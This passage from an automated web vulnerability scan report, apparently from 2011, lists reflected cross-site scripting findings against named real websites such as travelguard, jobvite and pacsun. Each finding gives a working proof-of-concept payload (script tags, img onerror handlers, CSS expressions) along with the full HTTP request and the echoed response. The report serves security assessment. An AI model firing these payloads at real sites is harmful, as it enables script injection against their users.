<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=e96a0';alert(1)//af8feb44cf2;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.4. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript rest-of-line comment. The payload 7a27f%0aalert(1)//47046b6433b was submitted in the br parameter. This input was echoed as 7a27f
alert(1)//47046b6433b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=tgdirect9c35a%27;alert(1)//bd29db8f83c7a27f%0aalert(1)//47046b6433b&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Error Page
</title><link href="/
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c7a27f
alert(1)//47046b6433b;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.5. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dms.netmng.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e0dc'%3balert(1)//3841c1206 was submitted in the u parameter. This input was echoed as 7e0dc';alert(1)//3841c1206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=7e0dc'%3balert(1)//3841c1206 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1242
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=7e0dc';alert(1)//3841c1206';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

5.6. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ad5</script><script>alert(1)</script>8c901f57b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xiknzn45ckbuvem4qyncebea; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=1c05d1d2-b665-4a52-bb90-2eb367a590e1; expires=Wed, 15-Jun-2011 10:23:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:18 GMT
Content-Length: 40309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
<!--
jvurlargs = '?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1';
jvurlargsclean = '?c=qlZ9Vfw8&70ad5</script>
...[SNIP]...

5.7. http://html.aggregateknowledge.com/iframe [wid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://html.aggregateknowledge.com
Path:	/iframe

Issue detail

The value of the wid request parameter is copied into the HTML document as plain text between tags. The payload 6503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a was submitted in the wid parameter. This input was echoed as 6503c<x style=x:expression(alert(1))>bcab1aa82a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /iframe?wid=26503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:30 GMT
Connection: close

<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "26503c<x style=x:expression(alert(1))>bcab1aa82a" to int / long.
at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50 was submitted in the REST URL parameter 4. This input was echoed as 19ce4<img src=a onerror=alert(1)>61e2893ba50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/AC_close_05211019ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:48 GMT
Connection: close

Unable to find /pacsun/AC_close_05211019ce4<img src=a onerror=alert(1)>61e2893ba50

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/FSO_041911

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58 was submitted in the REST URL parameter 4. This input was echoed as 7e30b<img src=a onerror=alert(1)>83e58811a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_0419117e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:43 GMT
Connection: close

Unable to find /pacsun/FSO_0419117e30b<img src=a onerror=alert(1)>83e58811a58

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f was submitted in the REST URL parameter 4. This input was echoed as d7f10<img src=a onerror=alert(1)>cc5d87d654f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo007d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo007d7f10<img src=a onerror=alert(1)>cc5d87d654f

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572 was submitted in the REST URL parameter 4. This input was echoed as 810a9<img src=a onerror=alert(1)>e15f190e572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo014810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/brand_logo015

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0 was submitted in the REST URL parameter 4. This input was echoed as b23f4<img src=a onerror=alert(1)>e609f813fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo015b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:52 GMT
Connection: close

Unable to find /pacsun/brand_logo015b23f4<img src=a onerror=alert(1)>e609f813fa0

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238 was submitted in the REST URL parameter 4. This input was echoed as ebcce<img src=a onerror=alert(1)>ff64f941238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo016ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:10 GMT
Connection: close

Unable to find /pacsun/brand_logo016ebcce<img src=a onerror=alert(1)>ff64f941238

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4 was submitted in the REST URL parameter 4. This input was echoed as a0352<img src=a onerror=alert(1)>8835400a2e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo017a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:58 GMT
Connection: close

Unable to find /pacsun/brand_logo017a0352<img src=a onerror=alert(1)>8835400a2e4

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c was submitted in the REST URL parameter 4. This input was echoed as 9be63<img src=a onerror=alert(1)>42202058f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btnASmallV39be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:56 GMT
Connection: close

Unable to find /pacsun/btnASmallV39be63<img src=a onerror=alert(1)>42202058f7c

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f was submitted in the REST URL parameter 4. This input was echoed as 5699c<img src=a onerror=alert(1)>3d73fa1077f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v25699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v25699c<img src=a onerror=alert(1)>3d73fa1077f

5.17. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/detailLogo_301

Issue detail

